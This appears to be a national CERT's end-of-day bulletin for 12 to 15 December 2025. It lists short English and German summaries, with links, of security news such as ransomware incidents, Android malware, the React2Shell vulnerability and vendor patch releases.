===================== = End-of-Day report = =====================

Timeframe: Freitag 12-12-2025 18:00 − Montag 15-12-2025 18:30 Handler: Guenes Holler Co-Handler: Felician Fuchs

===================== = News = =====================

∗∗∗ French Interior Ministry confirms cyberattack on email servers ∗∗∗ --------------------------------------------- The French Interior Minister confirmed on Friday that the countrys Ministry of the Interior was breached in a cyberattack that compromised e-mail servers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/france-interior-ministry-conf...

∗∗∗ Microsoft: Recent Windows updates break VPN access for WSL users ∗∗∗ --------------------------------------------- Microsoft says that recent Windows 11 security updates are causing VPN networking failures for enterprise users running Windows Subsystem for Linux. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-recent-windows-upd...

∗∗∗ Flaw in Hacktivist Ransomware Lets Victims Decrypt Own Files ∗∗∗ --------------------------------------------- A new version of VolkLocker, wielded by the pro-Russia RaaS group CyberVolk, has some key enhancements but one fatal flaw. --------------------------------------------- https://www.darkreading.com/threat-intelligence/flaw-hacktivist-ransomware-v...

∗∗∗ Cyberangriff: Hacker attackieren Ideal Versicherung mit Ransomware ∗∗∗ --------------------------------------------- Die auf Alters- und Pflegevorsorgeversicherungen spezialisierte Ideal Gruppe untersucht einen Ransomware-Befall. Der Geschäftsbetrieb ist eingeschränkt. --------------------------------------------- https://www.golem.de/news/cyberangriff-hacker-attackieren-ideal-versicherung...

∗∗∗ A look at an Android ITW DNG exploit ∗∗∗ --------------------------------------------- Between July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group. Investigation of these images showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices. --------------------------------------------- https://googleprojectzero.blogspot.com/2025/12/a-look-at-android-itw-dng-exp...

∗∗∗ Frogblight threatens you with a court case: a new Android banker targets Turkish users ∗∗∗ --------------------------------------------- Kaspersky researchers have discovered a new Android banking Trojan targeting Turkish users and posing as an app for accessing court case files via an official government webpage. The malware is being actively developed and may become MaaS in the future. --------------------------------------------- https://securelist.com/frogblight-banker/118440/

∗∗∗ ClickFix Attacks Still Using the Finger ∗∗∗ --------------------------------------------- Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day. --------------------------------------------- https://isc.sans.edu/diary/rss/32566

∗∗∗ Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads ∗∗∗ --------------------------------------------- Cybersecurity researchers are calling attention to a new campaign thats leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. --------------------------------------------- https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.ht...

∗∗∗ Arbeitssuchende aufgepasst! Vorsicht vor Jobportalen wie trabajo.org und bebee.com ∗∗∗ --------------------------------------------- Jobportale wie trabajo.org oder bebee.com werben mit attraktiven Stellenangeboten. Tatsächlich gibt es jedoch zahlreiche Hinweise darauf, dass man hier keine Jobs bekommt und sogar Daten abgegriffen werden könnten. --------------------------------------------- https://www.watchlist-internet.at/news/arbeitssuchende-aufgepasst-warum-sie-...

∗∗∗ Exploitation of Critical Vulnerability in React Server Components (Updated December 12) ∗∗∗ --------------------------------------------- We discuss the CVSS 10.0-rated RCE vulnerability in the Flight protocol used by React Server Components. This is tracked as CVE-2025-55182. --------------------------------------------- https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-...

∗∗∗ PureRAT Campaign Targets Job Seekers, Abuses Foxit PDF Reader for DLL Side-loading ∗∗∗ --------------------------------------------- Job seekers looking out for opportunities might instead find their personal devices compromised, as a PureRAT campaign propagated through email leverages Foxit PDF Reader for concealment and DLL side-loading for initial entry. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/l/valleyrat-campaign.html

∗∗∗ Fake Microsoft Teams and Google Meet Downloads Spread Oyster Backdoor ∗∗∗ --------------------------------------------- The Oyster backdoor (also known as Broomstick) is targeting the financial world, using malicious search ads for PuTTY, Teams, and Google Meet. --------------------------------------------- https://hackread.com/fake-microsoft-teams-google-meet-download-oyster-backdo...

∗∗∗ 16TB of MongoDB Database Exposes 4.3 Billion Lead Gen Records ∗∗∗ --------------------------------------------- Cybersecurity researchers discovered an unsecured 16TB database exposing 4.3 billion professional records, including names, emails, and LinkedIn data. Learn what happened, why this massive data leak enables new scams, and how to protect your PII. --------------------------------------------- https://hackread.com/mongodb-database-expose-lead-gen-records/

∗∗∗ GitHub Scanner for React2Shell (CVE-2025-55182) Turns Out to Be Malware ∗∗∗ --------------------------------------------- A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports. --------------------------------------------- https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/

∗∗∗ Patchday-Problem: Message-Queuing-Störungen in Windows 10, Server 2016 und 2019 ∗∗∗ --------------------------------------------- Die Sicherheitsupdates im Dezember stören das Message Queuing in Windows 10, Server 2016 und 2019. Fehlermeldungen sind die Folge. --------------------------------------------- https://heise.de/-11114815

∗∗∗ "Careless Whisper" side-channel attack affects WhatsApp and Signal ∗∗∗ --------------------------------------------- A tool for tracking over three billion WhatsApp and Signal users has been publicly released. Just by knowing the phone number, attackers can determine when users come home, when they are actively using the phone, when they go to sleep, or when they are offline. They can also drain batteries and data limits without the users noticing anything. --------------------------------------------- https://cybernews.com/security/whatsapp-signal-real-time-tracking-battery-dr...

∗∗∗ Rich Headers: leveraging this mysterious artifact of the PE format ∗∗∗ --------------------------------------------- We started our project with low expectations, thinking that there must be a reason the Rich Headers feature is overlooked and not widely utilized. Over time, we became more and more impressed with how much could be achieved by searching for feature clusters based on such a small part of an executable, and how powerful it can be when leveraged correctly. --------------------------------------------- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-header...

∗∗∗ Decompiling run-only AppleScripts ∗∗∗ --------------------------------------------- We validate the tool against XCSSET samples with known source Explore anti-analysis and anti-sandbox behavior in older malware Show common obfuscation tricks used in the wild Walk through key internals that make the decompiler workIntro to run-only AppleScripts. --------------------------------------------- https://pberba.github.io/security/2025/12/14/decompiling-run-only-applescrip...

===================== = Vulnerabilities = =====================

∗∗∗ Zero-Day-Lücken in Webkit: Angriffe auf iPhone-Nutzer beobachtet ∗∗∗ --------------------------------------------- Zwei aktiv ausgenutzte Sicherheitslücken gefährden Apple-Geräte wie iPhones, iPads und Macs. Anwender sollten zügig patchen. --------------------------------------------- https://www.golem.de/news/zero-day-luecken-in-webkit-angriffe-auf-iphone-nut...

∗∗∗ Kein Patch von Microsoft: Zero-Day-Lücke gefährdet alle gängigen Windows-Versionen ∗∗∗ --------------------------------------------- Forscher warnen vor einer Zero-Day-Lücke unter Windows. Richtig gefährlich wird diese in Kombination mit einer bereits bekannten Lücke. --------------------------------------------- https://www.golem.de/news/kein-patch-von-microsoft-zero-day-luecke-gefaehrde...

∗∗∗ FreePBX Patches Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws Enabling RCE ∗∗∗ --------------------------------------------- Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. --------------------------------------------- https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html

∗∗∗ Researcher Uncovers 30+ Flaws in AI Coding Tools Enabling Data Theft and RCE Attacks ∗∗∗ --------------------------------------------- Over 30 security vulnerabilities have been disclosed in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs) that combine prompt injection primitives with legitimate features to achieve data exfiltration and remote code execution. --------------------------------------------- https://thehackernews.com/2025/12/researchers-uncover-30-flaws-in-ai.html

∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, grafana, kernel, libsoup3, mysql8.4, and wireshark), Debian (ruby-git, ruby-sidekiq, thunderbird, and vlc), Fedora (apptainer, chromium, firefox, golangci-lint, libpng, and xkbcomp), Mageia (golang), SUSE (binutils, chromium, firefox, gegl, go1.25, govulncheck-vulndb, hauler, kernel, keylime, libpng12, pgadmin4, postgresql16, python, python-Django, python-django, python3, python311, rhino, thunderbird, unbound, and xkbcomp), and Ubuntu (usbmuxd). --------------------------------------------- https://lwn.net/Articles/1050523/

∗∗∗ Security updates 1.6.12 and 1.5.12 released ∗∗∗ --------------------------------------------- We just published security updates to the 1.6 and 1.5 LTS versions of Roundcube Webmail. They both contain fixes for recently reported two security vulnerabilities. --------------------------------------------- https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12

∗∗∗ React2Shell-Patch unzureichend, Angriffe weiten sich aus ∗∗∗ --------------------------------------------- Updates zum Schließen einer kritischen Lücke in React-Servern sind unvollständig. Immer mehr Angreifer missbrauchen das Leck. --------------------------------------------- https://www.heise.de/news/React2Shell-Patch-unzureichend-Angriffe-weiten-sic...

∗∗∗ Angreifer können mit TeamViewer DEX verwaltete PCs attackieren ∗∗∗ --------------------------------------------- Über TeamViewer DEX (Digital Employee Experience) managen Admins Firmencomputer. Nun können Angreifer an mehreren Schwachstellen ansetzen, um Geräte zu attackieren. --------------------------------------------- https://heise.de/-11114835